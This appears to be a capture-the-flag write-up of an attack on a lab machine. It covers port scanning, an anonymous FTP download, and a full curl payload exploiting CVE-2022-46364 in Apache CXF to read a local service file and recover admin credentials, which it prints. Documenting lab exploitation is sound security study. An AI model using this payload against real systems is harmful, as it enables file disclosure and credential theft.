Objective: Identify open ports and services on the target machine.
Command Executed:
nmap -p- --min-rate=1000 -T4 10.129.17.177
Output / Findings:
Action Taken: Added 10.129.17.177 devarea.htb to the local /etc/hosts file for easier access.
Objective: Investigate the anonymous FTP server to see if any sensitive files are exposed.
Command Executed:
wget -q ftp://anonymous:anonymous@10.129.17.177/pub/employee-service.jar
Findings: Successfully downloaded employee-service.jar. Decompiling the JAR with jd-gui showed that the application is built on Apache CXF 3.2.14 and exposes a SOAP web service at http://devarea.htb:8080/employeeservice (WSDL at http://devarea.htb:8080/employeeservice?wsdl).
Objective: Exploit CVE-2022-46364 in the bundled Apache CXF version. The flaw is a server-side request forgery in the MTOM attachment handling: the server resolves the href of any xop:Include element in the request, and file:// URLs are accepted, so it can be made to read local files and return their contents.
Command Executed:
curl -s -X POST "http://10.129.17.177:8080/employeeservice" \
-H 'Content-Type: multipart/related; type="application/xop+xml"; start="<root.message@cxf.apache.org>"; start-info="text/xml"; boundary="----=bound"' \
-d '------=bound
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-Transfer-Encoding: 8bit
Content-ID: <root.message@cxf.apache.org>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:dev="http://devarea.htb/">
  <soapenv:Header/>
  <soapenv:Body>
    <dev:submitReport>
      <arg0>
        <employeeName><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/systemd/system/hoverfly.service"/></employeeName>
        <department>IT</department>
        <content>test</content>
        <confidential>false</confidential>
      </arg0>
    </dev:submitReport>
  </soapenv:Body>
</soapenv:Envelope>
------=bound--'
Findings: The server responded with the base64-encoded content of /etc/systemd/system/hoverfly.service.
Command Executed:
echo "<base64_string>" | base64 -d
Extracted Credentials: The decoded service file revealed the Hoverfly admin credentials: admin:O7IJ27MyyXiU.